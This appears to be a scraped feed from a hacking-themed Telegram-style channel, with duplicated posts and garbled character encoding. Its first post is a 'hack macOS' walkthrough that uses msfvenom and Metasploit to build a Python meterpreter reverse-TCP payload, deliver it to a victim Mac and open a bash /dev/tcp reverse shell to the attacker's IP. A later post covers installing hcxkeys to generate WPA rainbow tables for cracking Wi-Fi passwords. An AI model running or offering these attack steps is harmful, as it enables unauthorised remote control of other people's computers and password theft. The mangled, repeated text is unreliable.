Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
The US Spy Agency warns of attacks by Chinese hackers on the army, security and industry.
#CyberAttacks
#CyberAttacks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK MACOS WITH PAYLOAD-Metasploit:
1) Turn on your Kali and open a terminal.
2) Type in msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
Now the pyterpreter.py should appear in your Home folder
pyterpreter script location
3) Open a new terminal and launch Metasploit by typing in msfconsole and press Enter. We need to set up a listener so when the script is running on the Mac computer it will instantly connect back to our attack machine.
msfconsole
4) In the new terminal, type in use multi/handler and press Enter
multi handler
5) Now we need to set the PAYLOAD, the LHOST which is the attacker IP address and the LPORT which is the port we want to listen on. You can do that by executing the following commands consecutively.
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130
set LPORT 4444
set payload lhost lport
6) To start up the handler, enter this command exploit -j -z
exploit
7) Now send the pyterpreter.py file to the Mac machine and execute it.
Enter the command session -i 1 and press Enter. You should now be able to interact with the Mac machine.
bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1
This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK MACOS WITH PAYLOAD-Metasploit:
1) Turn on your Kali and open a terminal.
2) Type in msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.26.130 LPORT=4444 > pyterpreter.py
Now the pyterpreter.py should appear in your Home folder
pyterpreter script location
3) Open a new terminal and launch Metasploit by typing in msfconsole and press Enter. We need to set up a listener so when the script is running on the Mac computer it will instantly connect back to our attack machine.
msfconsole
4) In the new terminal, type in use multi/handler and press Enter
multi handler
5) Now we need to set the PAYLOAD, the LHOST which is the attacker IP address and the LPORT which is the port we want to listen on. You can do that by executing the following commands consecutively.
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.26.130
set LPORT 4444
set payload lhost lport
6) To start up the handler, enter this command exploit -j -z
exploit
7) Now send the pyterpreter.py file to the Mac machine and execute it.
Enter the command session -i 1 and press Enter. You should now be able to interact with the Mac machine.
bash -i >& /dev/tcp/192.168.26.130/4444 0>&1 2>&1
This command simply means "send an interactive bash session to IP address 192.168.26.130 on TCP port 4444."
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Wi-Fi rainbow table generator
Wi-Fi rainbow tables can be generated by the wlangenpmkocl program from the hcxkeys package .
The hcxkeys package includes two utilities:
1) wlangenpmk - Generates plainmasterkeys (using CPU) from essid and password for use in hashcat (with hash mode 2501) or John the Ripper (hash type wpapsk-pmk)
2) wlangenpmkocl - generates plainmasterkeys (using GPU) from essid and password for use in hashcat (with 2501 hash mode) or John the Ripper (wpapsk-pmk hash type)
That is, the only difference between them is that
3) wlangenpmkocl uses a video card, while wlangenpmk uses a central processor. It is of course preferable to use the graphics card version (i.e. wlangenpmkocl ). The wlangenpmk version is only for extreme situations - you do not have a discrete video card or you cannot install its driver for full OpenCL support
π¦How to install hcxkeys
To use wlangenpmkocl , install the drivers for the video card, information about this and about OpenCL can be found in the articles:
Installing video drivers in Linux
How to crack passwords in Linux with a video card and a central processor
Installation on Kali Linux
1) sudo apt install openssl opencl-headers git
2) git clone https://github.com/ZerBea/hcxkeys
3) cd hcxkeys/
4) make
5) sudo make install
If the following messages are displayed while executing the make command :
1) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmk wlangenpmk.c -lcrypto
2) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmkocl wlangenpmkocl.c -lcrypto -lOpenCL
3) In file included from /usr/include/CL/cl.h:20,
from wlangenpmkocl.c:26:
/usr/include/CL/cl_version.h:22:9: note: β#pragma message: cl_version.h: CL_TARGET_OPENCL_VERSION is not defined.
4) Defaulting to 220 (OpenCL 2.2)β
22 | #pragma message("cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)")
| ^~~~~~~
5) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o pwhash pwhash.c -lcrypto
6) then these are not errors - they are information. Compilation should still succeed and you can continue.
Installation in BlackArch
sudo pacman -S hcxkeys
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Wi-Fi rainbow table generator
Wi-Fi rainbow tables can be generated by the wlangenpmkocl program from the hcxkeys package .
The hcxkeys package includes two utilities:
1) wlangenpmk - Generates plainmasterkeys (using CPU) from essid and password for use in hashcat (with hash mode 2501) or John the Ripper (hash type wpapsk-pmk)
2) wlangenpmkocl - generates plainmasterkeys (using GPU) from essid and password for use in hashcat (with 2501 hash mode) or John the Ripper (wpapsk-pmk hash type)
That is, the only difference between them is that
3) wlangenpmkocl uses a video card, while wlangenpmk uses a central processor. It is of course preferable to use the graphics card version (i.e. wlangenpmkocl ). The wlangenpmk version is only for extreme situations - you do not have a discrete video card or you cannot install its driver for full OpenCL support
π¦How to install hcxkeys
To use wlangenpmkocl , install the drivers for the video card, information about this and about OpenCL can be found in the articles:
Installing video drivers in Linux
How to crack passwords in Linux with a video card and a central processor
Installation on Kali Linux
1) sudo apt install openssl opencl-headers git
2) git clone https://github.com/ZerBea/hcxkeys
3) cd hcxkeys/
4) make
5) sudo make install
If the following messages are displayed while executing the make command :
1) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmk wlangenpmk.c -lcrypto
2) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmkocl wlangenpmkocl.c -lcrypto -lOpenCL
3) In file included from /usr/include/CL/cl.h:20,
from wlangenpmkocl.c:26:
/usr/include/CL/cl_version.h:22:9: note: β#pragma message: cl_version.h: CL_TARGET_OPENCL_VERSION is not defined.
4) Defaulting to 220 (OpenCL 2.2)β
22 | #pragma message("cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)")
| ^~~~~~~
5) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o pwhash pwhash.c -lcrypto
6) then these are not errors - they are information. Compilation should still succeed and you can continue.
Installation in BlackArch
sudo pacman -S hcxkeys
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ZerBea/hcxkeys: Small set of tools to generate plainmasterkeys (rainbowtables) and hashes for the use with latest hashcatβ¦
Small set of tools to generate plainmasterkeys (rainbowtables) and hashes for the use with latest hashcat and John the Ripper. - ZerBea/hcxkeys
Forwarded from UNDERCODE NEWS
Microsoft employees began moving to the new campus in Herzliya, which was established with an investment of about NIS 350 million .
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to make blurry special effects video with butter camera on android :
1. The first step is to open the butter camera, after entering, click the shooting icon at the bottom
2. After going to the album in the second step, select the video whose call distance should be blurred
3. After the third step goes to the layout interface, click Adjust
4. After the fourth step to adjust the interface, click on blur
5. After clicking on the fifth step, you can blur the video and use it as needed
apk link https://play.google.com/store/apps/details?id=com.flavionet.android.camera.pro&hl=en&gl=US
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to make blurry special effects video with butter camera on android :
1. The first step is to open the butter camera, after entering, click the shooting icon at the bottom
2. After going to the album in the second step, select the video whose call distance should be blurred
3. After the third step goes to the layout interface, click Adjust
4. After the fourth step to adjust the interface, click on blur
5. After clicking on the fifth step, you can blur the video and use it as needed
apk link https://play.google.com/store/apps/details?id=com.flavionet.android.camera.pro&hl=en&gl=US
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
Camera FV-5 - Apps on Google Play
Professional camera app that brings DSLR manual photography controls to Android.
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Static Keys(linux krnel for advanced pentesters):
Warning
A) DEPRECATED API:
The use of βstruct static_keyβ directly, is now DEPRECATED. In addition static_key_{true,false}() is also DEPRECATED. IE DO NOT use the following:
struct static_key false = STATIC_KEY_INIT_FALSE;
struct static_key true = STATIC_KEY_INIT_TRUE;
static_key_true()
static_key_false()
B) The updated API replacements are:
DEFINE_STATIC_KEY_TRUE(key);
DEFINE_STATIC_KEY_FALSE(key);
DEFINE_STATIC_KEY_ARRAY_TRUE(keys, count);
DEFINE_STATIC_KEY_ARRAY_FALSE(keys, count);
static_branch_likely()
static_branch_unlikely()
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Static Keys(linux krnel for advanced pentesters):
Warning
A) DEPRECATED API:
The use of βstruct static_keyβ directly, is now DEPRECATED. In addition static_key_{true,false}() is also DEPRECATED. IE DO NOT use the following:
struct static_key false = STATIC_KEY_INIT_FALSE;
struct static_key true = STATIC_KEY_INIT_TRUE;
static_key_true()
static_key_false()
B) The updated API replacements are:
DEFINE_STATIC_KEY_TRUE(key);
DEFINE_STATIC_KEY_FALSE(key);
DEFINE_STATIC_KEY_ARRAY_TRUE(keys, count);
DEFINE_STATIC_KEY_ARRAY_FALSE(keys, count);
static_branch_likely()
static_branch_unlikely()
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Major Ransomware accident cases:
o (Server) Ransomware infection and major data leakage due to insufficient security settings-
[ Case 1] Access to remote ports (3389, 22) from outside without using an easy password or access control policy-
[Case 2] Weak account management and security updates of VPN devices built to access the internal network are not applied-
[Case 3] ] Use of operating system and software for which security support has been terminated or security updates have not been applied
(PC) Ransomware infection and major data leakage due to non-compliance with security rules-
[Case 1] Attaching malicious mail disguised as official letters, resumes, estimates, etc. Execution of files (ransomware)
-[Case 2] Execution of files disguised as the latest movies downloaded through P2P programs (ransomware)
-[Case 3] Web in which malicious codes (ransomware) are hidden using a vulnerable version of the browse
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Major Ransomware accident cases:
o (Server) Ransomware infection and major data leakage due to insufficient security settings-
[ Case 1] Access to remote ports (3389, 22) from outside without using an easy password or access control policy-
[Case 2] Weak account management and security updates of VPN devices built to access the internal network are not applied-
[Case 3] ] Use of operating system and software for which security support has been terminated or security updates have not been applied
(PC) Ransomware infection and major data leakage due to non-compliance with security rules-
[Case 1] Attaching malicious mail disguised as official letters, resumes, estimates, etc. Execution of files (ransomware)
-[Case 2] Execution of files disguised as the latest movies downloaded through P2P programs (ransomware)
-[Case 3] Web in which malicious codes (ransomware) are hidden using a vulnerable version of the browse
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
